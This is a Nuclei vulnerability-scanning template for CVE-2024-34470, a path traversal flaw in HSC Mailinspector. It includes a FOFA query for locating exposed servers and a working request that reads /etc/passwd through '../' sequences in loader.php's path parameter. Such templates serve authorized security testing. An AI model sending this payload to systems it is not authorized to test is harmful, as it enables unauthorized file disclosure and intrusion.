nuclei-templates/http/cves/2024/CVE-2024-34470.yaml

50 lines
1.3 KiB
YAML
Raw Normal View History

2024-05-30 12:04:18 +00:00
id: CVE-2024-34470
info:
name: HSC Mailinspector 5.2.17-3 through 5.2.18 - Local File Inclusion
author: topscoder
severity: high
description: |
An Unauthenticated Path Traversal vulnerability exists in the /public/loaderphp file The path parameter does not properly filter whether the file and directory passed are part of the webroot, allowing an attacker to read arbitrary files on the server.
reference:
- https://github.com/osvaldotenorio/CVE-2024-34470
- https://github.com/nomi-sec/PoC-in-GitHub
- https://github.com/fkie-cad/nvd-json-data-feeds
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
epss-score: 0.00043
epss-percentile: 0.0866
metadata:
max-request: 1
fofa-query: "mailinspector/public"
tags: cve,cve2024,lfi,mailinspector,hsc
http:
- method: GET
path:
- "{{BaseURL}}/mailinspector/login.php"
host-redirects: true
matchers:
- type: word
part: body
words:
- "Licensed to HSC TREINAMENTO"
- method: GET
path:
- "{{BaseURL}}/mailinspector/public/loader.php?path=../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: status
status:
- 200